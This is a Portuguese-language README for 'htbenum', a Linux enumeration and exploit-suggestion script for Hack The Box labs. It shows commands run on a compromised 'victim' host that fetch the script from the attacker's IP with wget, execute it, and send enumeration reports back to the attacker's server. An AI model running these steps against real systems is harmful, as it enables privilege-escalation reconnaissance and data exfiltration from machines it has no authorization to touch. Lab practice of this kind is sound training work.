
Um script de enumeração Linux para Hack The Box
Um script de enumeração Linux para Hack The Box
Este script foi projetado para uso em situações onde você não tem acesso à internet em um host Linux e gostaria de executar scripts de enumeração e sugestão de exploração, como no Hack The Box. Costumo executar um conjunto semelhante de scripts quando consigo um ponto de apoio inicial em uma máquina Linux, e este script ajuda a automatizar o processo de baixar a versão mais recente de cada script de enumeração, torná-lo executável e executá-lo, além de enviar a saída para um arquivo para análise posterior. Ele também possui um servidor web embutido para hospedar as ferramentas e enviar relatórios de volta para a máquina host.
Pull requests/sugestões bem-vindos!

./htbenum.sh [-u] -i IP -p porta [-o diretório] [-w] [-r]
Exemplo:
Máquina host: root@kali:~/htbenum# ./htbenum.sh -u
Máquina host: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Máquina vítima: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
Máquina vítima: www-data@victim:/tmp$ chmod +x ./htbenum.sh
Máquina vítima: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Parâmetros:
-h - Visualizar ajuda e uso.
-i IP - Endereço IP do servidor web de escuta usado para upload e download.
-p porta - Porta TCP do servidor web de escuta usado para upload e download.
-o diretório - Diretório personalizado de download e criação de relatórios (padrão é /tmp).
-w - Iniciar servidor web embutido para baixar arquivos e enviar relatórios.
-u - Atualizar para as versões mais recentes de cada ferramenta, sobrescrevendo quaisquer versões existentes.
-r - Enviar relatórios de volta para o servidor web da máquina host (deve suportar requisições PUT).
Para usar o htbenum, clone o repositório e execute o script com o parâmetro update na sua máquina local. Isso baixará e atualizará todos os scripts necessários da internet (Github) e os colocará no mesmo diretório que htbenum.sh:
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum# ./htbenum.sh -u
_ _ ___________ _____ _ _ _ ____ ___
| | | |_ _| ___ \ ___| \ | | | | | \/ |
| |_| | | | | |_/ / |__ | \| | | | | . . |
| _ | | | | ___ \ __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\ | |_| | | | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_| |_/
By Solomon Sklash - [email protected]
[i] Updating all tools...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Update complete!
root@kali:~/htbenum#
Em seguida, inicie o servidor web embutido para hospedar as ferramentas e receber os relatórios concluídos. O servidor requer Python 3. Você pode usar seu próprio servidor web para hospedar as ferramentas, mas ele precisará suportar requisições PUT para os uploads de relatórios.
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Finalmente, faça o upload do script htbenum.sh para a máquina alvo, torne-o executável e execute-o com o IP e porta da sua máquina host, com um diretório opcional para baixar arquivos e escrever a saída dos relatórios. Você também pode opcionalmente enviar os relatórios de volta para a máquina host. Por exemplo:
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Cada ferramenta enviará sua saída para um arquivo de relatório no mesmo diretório do script htbenum.sh, ou qualquer diretório especificado pelo parâmetro -d.